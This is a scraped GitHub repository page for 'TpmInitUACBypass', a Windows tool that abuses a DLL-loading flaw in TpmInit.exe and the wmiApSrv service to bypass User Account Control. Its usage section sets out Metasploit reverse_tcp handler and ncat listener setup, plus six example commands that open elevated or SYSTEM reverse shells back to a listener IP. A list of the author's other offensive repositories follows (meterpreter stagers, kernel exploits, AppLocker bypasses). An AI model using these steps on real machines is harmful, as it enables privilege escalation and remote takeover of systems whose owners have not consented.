Cn33liz/TpmInitUACBypass Cn33liz/TpmInitUACBypass

  • Stars
    star
    125
  • Rank 286,335 (Top 6 %)
  • Language
    C++
  • Created about 8 years ago
  • Updated about 8 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Cn33liz/TpmInitUACBypass
github

Cn33liz

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Bypassing User Account Control (UAC) using TpmInit.exe 
   ______                ____      _ __
  /_  __/___  ____ ___  /  _/___  (_) /_
   / / / __ \/ __ `__ \ / // __ \/ / __/
  / / / /_/ / / / / / // // / / / / /_
 /_/ / .___/_/ /_/ /_/___/_/ /_/_/\__/
    /_/
               UAC Suicide Squad v1.1
                      By Cn33liz 2016

A tool to Bypass User Account Control (UAC), to get a High Integrity (or SYSTEM) Reversed Command shell, a reversed PowerShell session, or a Reversed Meterpreter session. When TpmInit.exe starts, it first tries to load the wbemcomn.dll within C:\Windows\System32\wbem. This DLL cannot be found in that folder, so it tries to load the DLL again, but then in C:\Windows\System32. This tool exploits this DLL loading vulnerability within TpmInit.exe, which runs auto-elevated by default. Same issue also applies to the WMI Performance Adapter service (wmiApSrv) which runs with SYSTEM privileges. So while we can use TpmInit.exe to get Elevated priviliges, we can also use it to start the wmiApSrv service, and get a SYSTEM shell using our custom DLL :)

Works on:

This version has been succesfully tested on Windows 8.1 x64 and Windows 10 x64 (Version 1511).

Compile:

This project is written in C/C++ using Windows API calls, so you need Visual Studio to compile.
Source code of the needed dll's are included within the project, but not needed to run the tool.
They are embedded within the main executable (as Base64 encoded and compressed binaries).

How to use it:

* [>] Usage: First setup a remote Netcat, Ncat or Meterpreter(x64) listener
* [>] Example: KickAss@PenTestBox:~$ sudo ncat -lvp 443

* [>] Or for msf: KickAss@PenTestBox:~$ sudo msfconsole
* [>] msf > use exploit/multi/handler
* [>] msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
* [>] msf exploit(handler) > set LHOST 10.0.0.1
* [>] msf exploit(handler) > set LPORT 443
* [>] msf exploit(handler) > exploit -j

* [>] Then on your target: TpmInitUACBypass.exe <Remote Listener IP> <Port> <powershell, cmd or msf> <system>

* [>] Example1: Remote Elevated Cmd Shell:   TpmInitUACBypass.exe 10.0.0.1 443 cmd
* [>] Example2: Remote SYSTEM Cmd Shell:     TpmInitUACBypass.exe 10.0.0.1 443 cmd system
* [>] Example3: Remote Elevated PowerShell:  TpmInitUACBypass.exe 10.0.0.1 443 powershell
* [>] Example4: Remote SYSTEM PowerShell:    TpmInitUACBypass.exe 10.0.0.1 443 powershell system
* [>] Example5: Remote Elevated Meterpreter: TpmInitUACBypass.exe 10.0.0.1 443 msf
* [>] Example6: Remote SYSTEM Meterpreter:   TpmInitUACBypass.exe 10.0.0.1 443 msf system

Strong Advice

  • Do not use accounts with Administrative privileges for daily computer usage!

More Repositories

1

p0wnedShell

PowerShell Runspace Post Exploitation Toolkit
C#
1,519
star
2

StarFighters

A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.
Visual Basic
319
star
3

MSBuildShell

MSBuildShell, a Powershell Host running within MSBuild.exe
283
star
4

CScriptShell

CScriptShell, a Powershell Host running within cscript.exe
C#
158
star
5

JSMeter

JavaScript Reversed TCP Meterpreter Stager
JavaScript
136
star
6

VBSMeter

VBS Reversed TCP Meterpreter Stager
Visual Basic
87
star
7

SmashedPotato

C#
83
star
8

p0wnedLoader

C#
72
star
9

p0shKiller

C++
62
star
10

HSEVD-StackOverflowX64

HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit with SMEP Bypass
C
62
star
11

MacroMeter

VBA Reversed TCP Meterpreter Stager
Visual Basic
62
star
12

MS17-012

MS17-012 - COM Session Moniker EoP Exploit running within MSBuild.exe
59
star
13

SharpCat

SharpCat - A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
C#
46
star
14

EasySystem

Quick and dirty System (Power)Shell using NamedPipe impersonation.
C
43
star
15

TpmInitUACAnniversaryBypass

Bypassing User Account Control (UAC) using TpmInit.exe
C++
42
star
16

HSEVD-ArbitraryOverwriteGDI

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI
C
40
star
17

HSEVD-StackOverflow

HackSys Extreme Vulnerable Driver - StackOverflow Exploit
C
30
star
18

p0wnedReverse

PowerShell Runspace Connect-Back Shell
C#
27
star
19

HSEVD-ArbitraryOverwrite

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit
C
25
star
20

HSEVD-VariousExploits

HackSys Extreme Vulnerable Driver - Various Windows 7 x86 Kernel Exploits
C
21
star
21

HSEVD-StackCookieBypass

HackSys Extreme Vulnerable Driver - StackOverflow with Stack Cookie Bypass Exploit
C
19
star
22

HSEVD-StackOverflowGDI

HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit using GDI
C
18
star
23

HackTheBox-Jail

HTB Jail Remote Exploit By Cneeliz - 2017
Python
15
star
24

HSEVD-ArbitraryOverwriteLowIL

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI -> Low Integrity to System
C
14
star
25

HackTheBox-Smasher

Python
8
star
26

FortiParse

Fortigate Configuration Parser
Python
4
star